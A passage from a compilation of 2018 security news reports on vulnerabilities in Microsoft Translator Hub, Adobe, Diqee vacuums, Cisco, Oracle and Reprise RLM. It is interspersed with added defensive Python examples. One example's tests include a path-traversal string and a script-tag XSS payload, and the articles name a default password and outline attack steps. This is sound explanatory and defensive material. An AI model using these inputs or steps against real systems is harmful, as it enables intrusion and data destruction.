An attack scenario, he says, would require an attacker to know the ProjectID of a logged-in victim. The attacker could then embed a URL in a page that issues the remove command; as soon as the victim visits that page, the request is sent from their browser and the project is removed.

Further analysis revealed an Insecure Direct Object Reference (IDOR) vulnerability, which essentially allowed an attacker to set any ProjectID in the HTTP project removal request and delete any of the projects in Microsoft Translator Hub.

In fact, by iterating through project IDs starting from 0 to 13000, an attacker could delete all projects from the database, the security researcher reveals.

Mahmood reported the vulnerability to Microsoft in late February 2018. The company addressed the issue within the next two weeks, and also offered the researcher an acknowledgement on their Online Researcher Acknowledgement page.
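The two defects reported here, a state-changing request with no CSRF protection and a project ID that the server accepts without checking ownership, are independent, so fixing one does not fix the other. The snippet below is an added example (not Translator Hub code) that puts a handler in the shape the article describes next to one carrying the three checks that close both gaps: POST only, a per-session anti-CSRF token compared in constant time, and object-level authorization on the referenced project. The in-memory store, session and request classes and the project IDs are constructed for the example.

```python
import hmac
import secrets
from dataclasses import dataclass, field
from typing import Dict


def sample_projects() -> Dict[int, dict]:
    """Constructed in-memory project store; not the real Translator Hub schema."""
    return {
        101: {"owner": "alice", "name": "en-fr glossary"},
        102: {"owner": "bob", "name": "de-en legal"},
    }


@dataclass
class Session:
    """A logged-in browser session. The CSRF token is minted per session and
    rendered into the site's own forms; a cross-site page never sees it."""
    user: str
    csrf_token: str = field(default_factory=lambda: secrets.token_urlsafe(32))


@dataclass
class Request:
    """Minimal stand-in for an HTTP request: the cookie-bound session plus form fields."""
    session: Session
    method: str
    form: Dict[str, str]


def delete_project_vulnerable(req: Request, projects: Dict[int, dict]) -> str:
    """Shape of the handler described in the article: the cookie proves the
    browser is logged in, and nothing else is checked, so a forged cross-site
    request succeeds and any projectid is accepted."""
    pid = int(req.form["projectid"])
    if pid in projects:
        del projects[pid]
        return "deleted"
    return "not found"


def delete_project_hardened(req: Request, projects: Dict[int, dict]) -> str:
    """Same endpoint with the checks the findings call for."""
    # 1. State-changing operations only over POST: a bare GET link must not delete.
    if req.method != "POST":
        return "method not allowed"
    # 2. Anti-CSRF: the form must carry the token bound to this session.
    sent = req.form.get("csrf_token", "")
    if not hmac.compare_digest(sent, req.session.csrf_token):
        return "csrf check failed"
    # 3. Object-level authorization: the caller must own the referenced project.
    try:
        pid = int(req.form["projectid"])
    except (KeyError, ValueError):
        return "bad request"
    project = projects.get(pid)
    if project is None or project["owner"] != req.session.user:
        # Same answer for "not yours" and "does not exist", so IDs cannot be enumerated.
        return "not found"
    del projects[pid]
    return "deleted"


if __name__ == "__main__":
    bob = Session("bob")
    forged = Request(bob, "POST", {"projectid": "101"})  # no token, alice's project
    print("vulnerable:", delete_project_vulnerable(forged, sample_projects()))
    print("hardened:  ", delete_project_hardened(forged, sample_projects()))
```

Note that the ownership check is what stops the 0-to-13000 sweep the researcher describes; a CSRF token alone would still let a logged-in user delete anyone's project.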


Adobe Patches Vulnerability Affecting Internal Systems
22.7.2018 securityweek
Vulnerability

Adobe has patched what researchers describe as a potentially serious security issue in its internal systems, but the company has downplayed the impact of the vulnerability.

White hat hackers at Germany-based security research firm Vulnerability Lab claim to have discovered that code submitted through some of Adobe’s event marketing registration forms ultimately made its way to one of the company’s main databases, from where it propagated to emails and web services.

Adobe told SecurityWeek that the issue was a cross-site scripting (XSS) bug in a form used for event marketing registration and said a fix had been implemented. If Adobe’s classification of the flaw is accurate, it was likely a persistent XSS.

Vulnerability Lab told SecurityWeek that it analyzed the issue between November 2017 and February 2018, when it reported its findings to the vendor. The company claims it took until May for Adobe to identify the cause of the problem, with a patch being implemented in mid-June.

Following the disclosure, Adobe included Vulnerability Lab on its industry partners page, which also lists CERT/CC, FireEye, Microsoft, Google, Tencent, Qihoo 360, Kaspersky, Palo Alto Networks and others.

The researchers said there were multiple domains where malicious code could have been inserted and there were multiple places where the code would be executed.

“The code was injected to a micro service, from there it was taken to the main application management service. Then it was synced into the main lead database of Adobe and we had several domains where we were able to place our codes with executable content,” explained Benjamin Kunz Mejri, CEO and founder of Vulnerability Lab.

The exploit code was delivered via emails sent out by Adobe and on some of the company’s domains, Kunz Mejri said.

Attack scheme

Vulnerability Lab has published a blog post and an advisory to describe the vulnerability.


Experts disclose dangerous flaws in robotic Dongguan Diqee 360 smart vacuums
22.7.2018 securityaffairs 
Vulnerability

Positive Technologies discovered two flaws affecting Dongguan Diqee 360 smart vacuums that can be used to perform video surveillance.
Security researchers from Positive Technologies have discovered two vulnerabilities affecting Dongguan Diqee 360 smart vacuum cleaners that could be exploited by an attacker to run malicious code on a device with superuser privileges.

The flaws likely also affect smart vacuum cleaners made by the company and sold under other brands, and the experts believe the issue could extend to other Dongguan devices, including DVRs, surveillance cameras, and smart doorbells.

“Like any other IoT device, these robot vacuum cleaners could be marshalled into a botnet for DDoS attacks, but that’s not even the worst-case scenario, at least for owners. Since the vacuum has Wi-Fi, a webcam with night vision, and smartphone-controlled navigation, an attacker could secretly spy on the owner” reads the post published by Positive Technologies.

The two vulnerabilities are tracked as CVE-2018-10987 and CVE-2018-10988; the former can be exploited by a remote attacker, while the latter requires physical access to the device.

The first bug can only be exploited by an authenticated attacker, but Positive Technologies says all Diqee 360 devices come with a default password of 888888 for the admin account, which very few users change, and which attackers can incorporate into their exploit chain.

Once an authenticated attacker has discovered the vacuum on the network by obtaining its MAC address, they can send a specially crafted UDP packet and execute commands on the vacuum cleaner as root. The bug resides in the REQUEST_SET_WIFIPASSWD function (UDP command 153).

“An attacker can discover the vacuum on the network by obtaining its MAC address and send a UDP request, which, if crafted in a specific way, results in execution of a command with superuser rights on the vacuum,” reads the report published by the experts.

“The vulnerability resides in the REQUEST_SET_WIFIPASSWD function (UDP command 153). To succeed, the attacker must authenticate on the device—which is made easier by the fact that many affected devices have the default username and password combination (admin:888888).”

The second vulnerability requires physical access: an attacker can load a tainted version of the firmware by inserting a microSD card into the vacuum.

“A microSD card could be used to exploit weaknesses in the vacuum’s update mechanism. After the card is inserted, the vacuum update system runs firmware files from the upgrade_360 folder with superuser rights, without any digital signature check. Therefore, a hacker could create a special script, place it on a microSD card in the upgrade_360 folder, insert this card, and restart the vacuum. This script could run arbitrary code, such as a sniffer to intercept private data sent over Wi-Fi by other devices.” states the post.

Positive Technologies responsibly reported the flaws in the smart vacuums to the company, giving it time to address the vulnerabilities. Unfortunately, it has no information about whether the vulnerabilities have been fixed to date.


Cisco fixes critical and high severity flaws in Policy Suite and SD-WAN products
19.7.2018 securityaffairs
Vulnerability

Cisco has found over a dozen critical and high severity vulnerabilities in its Policy Suite, SD-WAN, WebEx and Nexus products.
The tech giant has reported four critical vulnerabilities affecting the Policy Suite to customers.

The flaws tracked as CVE-2018-0374, CVE-2018-0375, CVE-2018-0376, and CVE-2018-0377 have been discovered during internal testing.

Two of these flaws could be exploited by a remote unauthenticated attacker to access the Policy Builder interface and the Open Systems Gateway initiative (OSGi) interface.

Access to the Policy Builder interface could allow an attacker to make changes to existing repositories and create new ones, while access to the OSGi interface could allow an attacker to access or change any file accessible by the OSGi process.

The lack of authentication could also allow an attacker to modify any data contained in the Policy Builder database.

“A vulnerability in the Policy Builder database of Cisco Policy Suite could allow an unauthenticated, remote attacker to connect directly to the Policy Builder database.” reads the security advisory published by Cisco.

“The vulnerability is due to a lack of authentication. An attacker could exploit this vulnerability by connecting directly to the Policy Builder database. A successful exploit could allow the attacker to access and change any data in the Policy Builder database.”

Cisco also warned that the Cluster Manager in Policy Suite has a root account with default and static credentials. A remote attacker can exploit this to access the account and execute arbitrary commands with root privileges.

Cisco also warned of seven flaws in its SD-WAN solution; one of them affects the Zero Touch Provisioning service and could be exploited by an unauthenticated attacker to trigger a denial-of-service (DoS) condition.

Other SD-WAN vulnerabilities could allow an authenticated attacker to overwrite arbitrary files on the underlying operating system, and execute arbitrary commands with vmanage or root privileges.

Cisco also reported a high severity DoS vulnerability affecting Nexus 9000 series Fabric switches; the issue resides in the implementation of the DHCPv6 feature.

Cisco fixed all the vulnerabilities and confirmed that none of them has been exploited in attacks in the wild.


Code hosting service GitHub can now scan also for vulnerable Python code
19.7.2018 securityaffairs
Vulnerability

The code hosting service GitHub added Python to the list of programming languages that it is able to auto-scan for known vulnerabilities.
Good news for GitHub users, the platform added Python to the list of programming languages that it is able to auto-scan for known vulnerabilities.

In March, the code hosting service GitHub confirmed that the introduction of security alerts in November had led to a significant reduction of vulnerable code libraries on the platform.

GitHub alerts warn developers when they include certain flawed software libraries in their projects and provide advice on how to address the issue.

Last year GitHub introduced the Dependency Graph, a feature that lists all the libraries used by a project. The feature initially supported JavaScript and Ruby, and the company announced it would add support for Python within the year.

GitHub Security Alerts

The GitHub security alerts feature introduced in November is designed to alert developers when one of their project’s dependencies has known flaws. The Dependency graph and the security alerts feature have been automatically enabled for public repositories, but they are opt-in for private repositories.

The dependency graph allows GitHub to notify project owners when it detects a known security vulnerability in one of their dependencies and to suggest known fixes from the GitHub community.

An initial scan conducted by GitHub revealed more than 4 million vulnerabilities in more than 500,000 repositories. GitHub notified affected users, and by December 1 more than 450,000 of the vulnerabilities had been addressed, either by updating the affected library or removing it altogether.

Vulnerabilities are in a vast majority of cases addressed within a week by active developers.

With support for Python, developers can now receive alerts for code written in this language as well.

“We’re pleased to announce that we’ve shipped Python support. As of this week, Python users can now access the dependency graph and receive security alerts whenever their repositories depend on packages with known security vulnerabilities.” reads the announcement published by GitHub quality engineer Robert Schultheis.

“We’ve chosen to launch the new platform offering with a few recent vulnerabilities. Over the coming weeks, we will be adding more historical Python vulnerabilities to our database. Going forward, we will continue to monitor the NVD feed and other sources, and will send alerts on any newly disclosed vulnerabilities in Python packages.”

The company confirmed that the scanner is enabled by default on public repositories, while for private repositories the maintainers need to opt in to security alerts in the repository settings or give the dependency graph access to the repo from the “Insights” tab.

“Public repositories will automatically have your dependency graph and security alerts enabled. For private repositories, you’ll need to opt in to security alerts in your repository settings or by allowing access in the dependency graph section of your repository’s “Insights” tab.” concludes Schultheis.

“When vulnerability alerts are enabled, admins will receive security alerts by default. Admins can also add teams or individuals as recipients for security alerts by going into their repository’s settings page and navigating to the “Alerts” tab.”
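What a dependency scanner of this kind does underneath is mechanical: read the project's dependency manifest, normalise package names, and compare each pinned version against the vulnerable range in an advisory record. The script below is an added example (not GitHub's implementation) of that matching logic for a Python `requirements.txt`; the advisory entries, their identifiers and the sample requirements are constructed, and only exact `==` pins are scanned because an unpinned requirement does not tell the scanner which version is installed.

```python
import re
from typing import Dict, List, Tuple

# Constructed advisory records in the shape a dependency scanner needs: the
# package, the first vulnerable version and the first fixed version.
# The identifiers are illustrative, not real advisories.
ADVISORIES = [
    {"id": "EXAMPLE-0001", "package": "examplelib", "introduced": "1.0.0", "fixed": "1.4.2"},
    {"id": "EXAMPLE-0002", "package": "Other_Pkg", "introduced": "0.0.0", "fixed": "2.0.0"},
]

# A constructed requirements.txt with the cases the matcher has to handle.
SAMPLE_REQUIREMENTS = """\
examplelib == 1.3.0        # inside the vulnerable range
other-pkg==2.1.0           # already at or past the fixed version
requests>=2.0              # unpinned: installed version unknown, so skipped
"""

# name==version, optional whitespace around the operator (comments already stripped)
_PIN = re.compile(r"^([A-Za-z0-9][A-Za-z0-9._-]*)\s*==\s*([0-9]+(?:\.[0-9]+)*)$")


def normalize(name: str) -> str:
    """PEP 503 style normalisation so 'Other_Pkg' and 'other-pkg' compare equal."""
    return re.sub(r"[-_.]+", "-", name).lower()


def parse_version(v: str) -> Tuple[int, ...]:
    """Dotted numeric versions compare correctly as integer tuples (1.10 > 1.9)."""
    return tuple(int(x) for x in v.split("."))


def parse_requirements(text: str) -> Dict[str, str]:
    """Map normalised package name -> pinned version for every '==' line."""
    pins: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        m = _PIN.match(line)
        if m:
            pins[normalize(m.group(1))] = m.group(2)
    return pins


def find_vulnerable(pins: Dict[str, str], advisories=ADVISORIES) -> List[dict]:
    """An advisory matches a pin when introduced <= pinned < fixed."""
    hits = []
    for adv in advisories:
        pinned = pins.get(normalize(adv["package"]))
        if pinned is None:
            continue
        pv = parse_version(pinned)
        if parse_version(adv["introduced"]) <= pv < parse_version(adv["fixed"]):
            hits.append({"package": adv["package"], "pinned": pinned,
                         "advisory": adv["id"], "upgrade_to": adv["fixed"]})
    return hits


if __name__ == "__main__":
    for hit in find_vulnerable(parse_requirements(SAMPLE_REQUIREMENTS)):
        print(f"{hit['package']}=={hit['pinned']}: {hit['advisory']}, upgrade to {hit['upgrade_to']}")
```

Real advisory feeds carry several disjoint ranges per package and pre-release or post-release version suffixes, which is why production scanners use a full PEP 440 version parser rather than the integer-tuple comparison used here.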


Cisco Finds Serious Flaws in Policy Suite, SD-WAN Products
19.7.2018 securityweek 
Vulnerability

Cisco informed customers on Wednesday that it has found and patched over a dozen critical and high severity vulnerabilities in its Policy Suite, SD-WAN, WebEx and Nexus products.

The networking giant reported discovering four critical flaws in Policy Suite during internal testing. Two of these security holes are unauthenticated access issues that allow a remote attacker to access the Policy Builder interface and the Open Systems Gateway initiative (OSGi) interface.

Once they gain access to the Policy Builder interface, which is exposed due to a lack of authentication, attackers can make changes to existing repositories and create new repositories. The OSGi interface allows an attacker to access or change any file accessible by the OSGi process.

The lack of an authentication mechanism also exposes the Policy Builder database, allowing an attacker to access and change any data stored in it.

Cisco also discovered that the Cluster Manager in Policy Suite has a root account with default and static credentials. A remote attacker can log in to this account and execute arbitrary commands with root privileges.

These critical Policy Suite vulnerabilities are tracked as CVE-2018-0374, CVE-2018-0375, CVE-2018-0376 and CVE-2018-0377.

Cisco has also fixed a total of seven flaws in its SD-WAN solution. The only one of these vulnerabilities that can be exploited remotely without authentication impacts the Zero Touch Provisioning service and it allows an attacker to cause a denial-of-service (DoS) condition.

The other SD-WAN security holes, which require authentication, can be exploited to overwrite arbitrary files on the underlying operating system, and execute arbitrary commands with vmanage or root privileges. One of the SD-WAN bugs requires both authentication and local access for exploitation.

Cisco also informed customers that its Nexus 9000 series Fabric switches, specifically their DHCPv6 feature, are impacted by a high severity flaw that can be exploited by a remote and unauthenticated attacker to cause a DoS condition.

The company has also assigned a high severity rating to multiple vulnerabilities affecting the Cisco Webex Network Recording Player for Advanced Recording Format (ARF) and Webex Recording Format (WRF) files. The security bugs can be exploited for arbitrary code execution by getting the targeted user to open specially crafted ARF or WRF files using the affected player.

None of the vulnerabilities patched this week appear to have been exploited for malicious purposes.


ABB to Patch Code Execution Flaw in HMI Tool
19.7.2018 securityweek 
Vulnerability

Swiss industrial tech company ABB is working on a patch for a serious arbitrary code execution vulnerability affecting one of its engineering tools.

The security hole, tracked as CVE-2018-10616, impacts all versions of Panel Builder 800. ABB’s Panel 800 devices provide operator panels for process automation systems, and the Panel Builder is an engineering tool for the process panels included in the product suite. According to ICS-CERT, which published an advisory this week, the tool is used worldwide in the chemical, critical manufacturing, dams, energy, water, and food and agriculture sectors.

Researchers discovered that the HMI tool, specifically its file parser component, is affected by a high severity improper input validation flaw that can allow an attacker to run arbitrary code on the device hosting the affected utility.

A remote attacker can exploit the vulnerability for arbitrary code execution by tricking a local user into opening a specially crafted file. The weakness cannot be exploited without user interaction, ABB pointed out.

The vendor says it’s working on a patch. In the meantime, it has advised customers to ensure that their employees are aware of the threat posed by opening malicious files with the Panel Builder tool, to scan files transferred between devices, and avoid giving users more permissions than required for their job.

ABB says it’s not aware of any malicious exploits targeting this vulnerability and details of the security hole have not been publicly disclosed.

The vulnerability was reported to ABB by Michael DePlante of the Leahy Center for Digital Investigation at Champlain College and Michael Flanders of Trend Micro, both working with the Zero Day Initiative (ZDI).

ZDI lists over 30 upcoming advisories for vulnerabilities discovered by DePlante and Flanders in ABB products, and a majority have been assigned CVSS scores of 9.3, which puts them in the critical severity category. While there are more than 30 advisories, ZDI often publishes a separate advisory for each variation of a flaw, but vendors typically view them as a single issue and only one CVE identifier gets assigned to them.


Vulnerability or Not? Pen Tester Quarrels With Software Maker
19.7.2018 securityweek 
Vulnerability

Security Industry Battles Over Testing Methods

Researcher Publishes PoC; Vendor Says it's Not a Vulnerability

A SpiderLabs security researcher has published details of what he considers to be a vulnerability in the RLM web application provided by Reprise Software. Reprise CEO Matt Christiano has told SecurityWeek it is not a vulnerability.

RLM is the Reprise License Manager, described by Reprise as "a flexible and easy-to-use license manager with the power to serve enterprise users." The researcher is Adrian Pruteanu, security consultant with SpiderLabs at Trustwave.

During a penetration engagement, Pruteanu writes, "I was able to identify a critical vulnerability which allowed me to execute code on the server, eventually leading to full domain compromise. Regrettably, despite my best efforts, the vendor has refused to issue patches as they do not believe these findings to be vulnerabilities."

Christiano responded, "The issue described in the [SpiderLabs] article is certainly not a vulnerability, it is misuse of the product."

Pruteanu claims RLM allows users (and attackers) to read and write data to any file on disk provided RLM has access to it. By default, RLM's web server, running on port 5054, does not require authentication. This allows an attacker to write malware to the user startup folder without administrator access and even if RLM.exe is running under a low-privilege user. If RLM.exe is privileged, the malware can be written to the All Users Startup folder.

Christiano retorts, "RLM does not require elevated permissions to perform any operation, and is designed to be run in a segregated, non-privileged account. To install the program as root/administrator is simply negligent. This is clearly documented."

Christiano goes on to state that port 5054 was assigned to RLM by IANA in 2008. Furthermore, he adds, "License server machines are rarely internet-facing, and when they are, port 5054 is not required for operation, and should not be enabled thru the company's firewall."

The researcher provides a full proof of concept (PoC) for his 'vulnerability'. He also located a cross-site scripting (reflected) vulnerability in the lf parameter of the /goform/edit_lf_get_data URL in RLM's web interface. RLM does not enforce POST for this URL and the payload can also be passed with a GET request.

What worries the researcher even more than the vulnerabilities themselves (vulnerabilities can be fixed through responsible disclosure) has been the vendor's support staff response to the disclosure. Pruteanu reports, "During our email correspondence the general theme could be wrapped up in the following quotes: 'We tell end users not to run the rlm server (which implements the web server) in privileged mode. There is no reason it needs to run with elevated privileges'."

Pruteanu's response is that users typically ignore best practices and leave pre-existing defaults untouched.

Reprise support continued, "We do not consider this a vulnerability, any more than vi or notepad are vulnerabilities. Of course, NO ONE should run the servers as root/administrator; if they do, they deserve what they get. They can, also, disable the web interface, or, if they want to run it, they can enable logins for it. So there are plenty of opportunities for an admin to prevent any file writing."

Christiano expanded on his support staff comments. He clearly sees the issue as user or installer security misconfiguration (#6 in OWASP's current Top Ten Web Application Risks) rather than a vulnerability. "SpiderLabs refused to identify the 'customer' with this 'problem', denying us the opportunity to review our ISV's installation procedures and correct them," he said.

Of course, SpiderLabs is almost certainly enjoined by customer NDAs not to mention it by name. "One could argue," continued Christiano, "that SpiderLabs cares less about solving the problem than they do about creating sensational headlines to generate more business. I am not arguing that, but one could."

The timeline for the researcher's attempted responsible disclosure is short and limited. Over the course of just 13 days in May 2018, the researcher claims that he disclosed the vulnerabilities; the vendor, he says, refused to accept they are vulnerabilities and refused to patch; the researcher encouraged the vendor to reconsider; and the vendor chose to discontinue communication. There was no route to escalate the issue beyond the support person; and Pruteanu feels he had no alternative but to go to public disclosure.

But Christiano refutes this. "We did correspond with SpiderLabs thru June 2018 (not May)," he told SecurityWeek, "and described the situation to them; we received no further reply from them until they provided you with this misleading information."

"The biggest problem we run into during the disclosure process," comments Pruteanu, "is getting the disclosure in front of the correct audience. Even though these vendors are basically getting a free audit that helps them secure their products for their customers, we are often met with hostility simply because they are unsure how to handle the report. If you don't have the capability to support this process in house there are third party options like Bugcrowd."

Christiano replies, "It is not at all clear how [SpiderLabs] did their testing, or how the software was installed. Clearly, it was installed incorrectly. Finally, Reprise has never refused to address any security vulnerability in any of our products."

It comes down to whether 'allowing' misconfiguration is in itself a vulnerability. Pruteanu believes it is. Christiano believes it is not, and that software installers have a responsibility to configure applications in the way intended and advised.

Chicago-based data security and compliance solutions firm Trustwave was acquired by Singapore Telecommunications (Singtel) for $810 million in cash in April 2015.
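Whichever side of the "vulnerability or misconfiguration" argument one takes, the two findings Pruteanu describes (file access anywhere the process can reach, and a reflected XSS in the `lf` parameter that is also accepted over GET) are both missing checks in the request handler, and neither depends on the account the server runs under. The snippet below is an added illustration, not Reprise's code and not the SpiderLabs proof of concept, of what a hardened handler for a log-file parameter verifies: an authenticated session, POST only for anything that edits, a file name confined to the configured log directory, and HTML-escaping of the name when it is echoed. The route name, the log directory and the handler signature are assumptions.

```python
import html
from pathlib import Path
from typing import Tuple


def is_within(base_dir: str, user_path: str) -> bool:
    """True only if base_dir/user_path resolves to a file strictly under base_dir.

    Resolving first and comparing afterwards is what defeats '..' segments,
    absolute paths and symlinks that point out of the directory.
    """
    base = Path(base_dir).resolve()
    target = (base / user_path).resolve()
    if target == base:
        return False  # the directory itself is not a log file
    try:
        target.relative_to(base)
        return True
    except ValueError:
        return False


def handle_edit_lf(method: str, authenticated: bool, lf: str,
                   log_dir: str = "/srv/licserver/logs") -> Tuple[int, str]:
    """Hardened stand-in for an 'edit/show log file' web route (assumed name).

    Returns (HTTP status, response body). log_dir is a constructed path.
    """
    if not authenticated:
        return 401, "login required"
    if method != "POST":
        # A link in an e-mail or a third-party page is a GET; refusing it
        # removes the reflected-over-GET variant the researcher describes.
        return 405, "method not allowed"
    if not is_within(log_dir, lf):
        return 400, "file name must stay inside the log directory"
    # Echo the value only after escaping so a crafted name cannot become markup.
    return 200, f"<p>Log file: {html.escape(lf, quote=True)}</p>"


if __name__ == "__main__":
    for case in (("GET", True, "server.log"),
                 ("POST", False, "server.log"),
                 ("POST", True, "../../../../Users/Public/Startup/x.bat"),
                 ("POST", True, "<script>alert(1)</script>.log"),
                 ("POST", True, "server.log")):
        print(case, "->", handle_edit_lf(*case))
```

Running the service as a low-privilege account, as Reprise advises, limits what a successful write can reach; the directory confinement above is what prevents the write from leaving the log directory in the first place, regardless of how the installer set the account up.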


Siemens Informs Customers of New Meltdown, Spectre Variants
19.7.2018 securityweek 
Vulnerability

Siemens recently updated its security bulletin for the Meltdown and Spectre vulnerabilities to inform customers of the latest variants, specifically the ones known as LazyFP and Spectre 1.1.

Several industrial control systems (ICS) vendors published security advisories for the CPU flaws shortly after they were disclosed in early January. Siemens published a bulletin on speculative side-channel vulnerabilities on January 11.

In late May, the company updated its bulletin to include information about Variant 3a and Variant 4, which are also known as Spectre-NG. On Tuesday, Siemens once again updated the security bulletin to describe the variants known as LazyFP, a medium severity Meltdown-like flaw disclosed in mid-June and tracked as CVE-2018-3665, and Spectre 1.1, disclosed earlier this month and tracked as CVE-2017-5753.

LazyFP is related to the floating point unit (FPU), also known as the math coprocessor. Researchers discovered that if certain conditions are met an attacker may be able to access FPU state data, which can contain sensitive information, such as cryptographic keys.

Spectre 1.1, described as a bounds check bypass store (BCBS) issue, was disclosed along with Spectre 1.2. Intel awarded $100,000 to the researchers who identified these variants.

While LazyFP and Spectre 1.1 are related to the original Meltdown and Spectre vulnerabilities, CPU and operating system vendors are not as concerned about their impact.

Siemens has advised customers to keep an eye out for software and firmware updates provided for operating systems and processors, but warned that some of these updates “can result in compatibility, performance or stability issues.”

The German industrial giant continues to analyze the impact of these vulnerabilities on its products.

In the case of the original Meltdown and Spectre flaws, they have been found to impact many Siemens products, including SIMATIC, RUGGEDCOM, SIMOTION, SINEMA and SINUMERIK devices. The company has released both software and BIOS updates, along with workarounds and mitigations.


Oracle Patches Record 334 Vulnerabilities in July 2018
19.7.2018 securityweek 
Vulnerability

Oracle Patches Over 200 Remotely Exploitable Vulnerabilities in July 2018 Critical Patch Update

Oracle this week released its July 2018 set of patches to address a total of 334 security vulnerabilities, the largest number of flaws resolved with a Critical Patch Update (CPU) to date. Over 200 of the bugs may be remotely exploitable without authentication.

This month, 23 products from the enterprise security giant were patched, including E-Business Suite, Financial Services Applications, Fusion Middleware, Hospitality Applications, Java SE, MySQL, PeopleSoft Products, Retail Applications, Siebel CRM, and the Sun Systems Products Suite.

More than 50 of the flaws addressed this month had a CVSS 3.0 Base Score of 9.8. Overall, 61 security bugs had a CVSS score of 9.0 or above, according to Oracle’s advisory.

A total of 203 vulnerabilities were patched in business-critical applications, around 65% of which could be exploited remotely without entering credentials, ERPScan, a company that specializes in securing Oracle and SAP applications, points out.

This month, Financial Services Applications received the largest number of fixes, at 56; 21 of these vulnerabilities may be remotely exploitable without authentication.

Fusion Middleware received the second largest number of patches, at 44, with 38 of the addressed issues remotely exploitable without authentication.

Next in line are Retail Applications at 31 fixes (26 flaws being remotely exploitable) and MySQL, also with 31 patches (only 7 bugs remotely exploitable), followed by Hospitality Applications with 24 fixes (7 issues remotely exploitable), Sun Systems Products Suite at 22 patches (10 flaws remotely exploitable), and Enterprise Manager Products Suite with 16 fixes (all remotely exploitable without authentication).

Oracle also addressed vulnerabilities in PeopleSoft Products (15 bugs – 11 remotely exploitable without authentication), E-Business Suite (14 flaws – 13 remotely exploitable), Communications Applications (14 – 10), Virtualization (12 – 2), Construction and Engineering Suite (11 – 6), JD Edwards Products (10 – 9), Java SE (8 – 8), and Supply Chain Products Suite (8 – 6).

“On the surface, the downward trend of Java SE patches would appear to be positive,” Apostolos Giannakidis, Security Architect at Waratek, told SecurityWeek. “However, several actions taken to fix Java SE vulnerabilities in the July CPU are likely to break the functionality of certain applications. Application owners who apply binary patches should be extremely cautious and thoroughly test their applications before putting patches into production.”

"The fix for the most critical Java SE vulnerability in the July CPU - CVE-2018-2938 - removes the vulnerable component (Java DB) from the JDK," Waratek explained in a guidance note sent to SecurityWeek Wednesday. "Users that depend on this component must manually obtain the latest Apache Derby artifacts and rebuild their applications."

The least impacted products include Utilities Applications (4 vulnerabilities – 3 remotely exploitable without authentication), Policy Automation (3 flaws – all remotely exploitable), and Database Server (3 – 1).

All of the vulnerabilities impacting Hyperion (2 bugs), Insurance Applications (2), Global Lifecycle Management (1), iLearning (1), Siebel CRM (1), and Support Tools (1) may be exploited remotely without authentication.

Some of the most important issues addressed this month could be exploited remotely to take over the impacted application: CVE-2017-15095 in Oracle Spatial, CVE-2018-7489 in Global Lifecycle Management OPatchAuto component, CVE-2018-2943 in Fusion Middleware MapViewer, CVE-2018-2894 in WebLogic Server, and CVE-2017-5645 in PeopleSoft Enterprise FIN Install.

In late June, Oracle announced the availability of patches for new variants of the speculative execution attack methods known as Meltdown and Spectre. The company released the first set of mitigations against Spectre and Meltdown as part of the January 2018 CPU.

All Oracle customers are advised to apply the fixes included in Oracle’s Critical Patch Updates without delay, as some of the addressed vulnerabilities are being targeted by malicious actors in live attacks.

“Oracle continues to periodically receive reports of attempts to maliciously exploit vulnerabilities for which Oracle has already released fixes. In some instances, it has been reported that attackers have been successful because targeted customers had failed to apply available Oracle patches,” the company notes.


Cisco Patches High Risk Flaws in StarOS, IP Phone
18.7.2018 securityweek 
Vulnerebility

Cisco this week released a set of security patches to address several vulnerabilities in its products, including High risk issues impacting StarOS and 6800, 7800, and 8800 Series IP Phones.

The first High severity bug (CVE-2018-0369) impacts the reassembly logic for fragmented IPv4 packets of Cisco StarOS running on virtual platforms. By abusing this security flaw, an unauthenticated remote attacker could trigger a reload of the npusim process, thus causing denial of service (DoS).

An attacker could trigger the simultaneous reload of all four instances of the npusim process that are running per Service Function (SF) instance.

According to Cisco, the vulnerability resides in the improper handling of fragmented IPv4 packets containing options. Thus, an attacker could exploit the issue by sending a malicious IPv4 packet across an affected device.

“An exploit could allow the attacker to trigger a restart of the npusim process, which will result in all traffic queued toward this instance of the npusim process to be dropped while the process is restarting. The npusim process typically restarts within less than a second,” Cisco explains in an advisory.

Impacted products include Cisco Virtualized Packet Core-Single Instance (VPC-SI), Cisco Virtualized Packet Core-Distributed Instance (VPC-DI), and Cisco Ultra Packet Core (UPC) running StarOS operating system releases prior to the fixed version.

The second High risk flaw (CVE-2018-0341) addressed this week impacts the web-based UI of Cisco IP Phone 6800, 7800, and 8800 Series with Multiplatform Firmware and could be exploited by an authenticated, remote attacker for command injection.

“The vulnerability is due to insufficient input validation. An attacker could exploit this vulnerability by including arbitrary shell commands in a specific user input field,” Cisco says.

In addition to these two bugs, Cisco addressed six Medium severity issues in Web Security Appliance (WSA), FireSIGHT System Software, Firepower System Software, and Digital Network Architecture (DNA).

Exploitation of these vulnerabilities could result in denial of service, bypass of file policy, bypass of URL-based access control policy, and cross-site scripting (XSS) attacks, Cisco’s advisories reveal.


Over 100 Vulnerabilities Patched in Adobe Acrobat, Reader
18.7.2018 securityweek 
Vulnerebility

Adobe on Tuesday released security updates that patch 105 vulnerabilities in Acrobat and Reader, two in Flash Player, three in Experience Manager, and three in Connect.

The latest versions of Acrobat and Reader for Windows and macOS address tens of critical memory corruption bugs that can allow remote code execution, including double-free, heap overflow, use-after-free, out-of-bounds write, type confusion, untrusted pointer dereference, and buffer error issues.

The list of weaknesses fixed with this month’s Patch Tuesday updates also includes a critical privilege escalation and tens of important out-of-bounds read issues that lead to information disclosure.

Over two dozen researchers have been credited for responsibly disclosing these flaws to Adobe. Many of the security holes were reported to the vendor through Trend Micro’s Zero-Day Initiative (ZDI).

In the case of Flash Player, version 30.0.0.134 resolves a critical type confusion issue that can lead to code execution and a flaw rated important that can result in information disclosure.

Hotfixes released by Adobe for Experience Manager patch three server-side request forgery (SSRF) vulnerabilities that can lead to the exposure of sensitive information, but none of the flaws are considered critical.

Finally, updates released for Adobe Connect fix authentication bypass and insecure library loading flaws that have been assigned medium and important severity ratings.

Adobe says it’s not aware of any malicious exploitation attempts for the vulnerabilities patched with this round of updates and the company does not expect to see attacks leveraging these flaws any time soon.


Microsoft Patch Tuesday Updates Fix Over 50 Vulnerabilities
18.7.2018 securityweek 
Vulnerebility

Microsoft’s Patch Tuesday updates for July 2018 address more than 50 vulnerabilities, but none of them appear to have been exploited for malicious purposes before the fixes were released.

The company has classified 18 of the flaws as critical and, similar to previous months, they mostly affect the Edge and Internet Explorer web browsers. Many of these security holes have been described as memory corruption bugs that allow remote code execution.

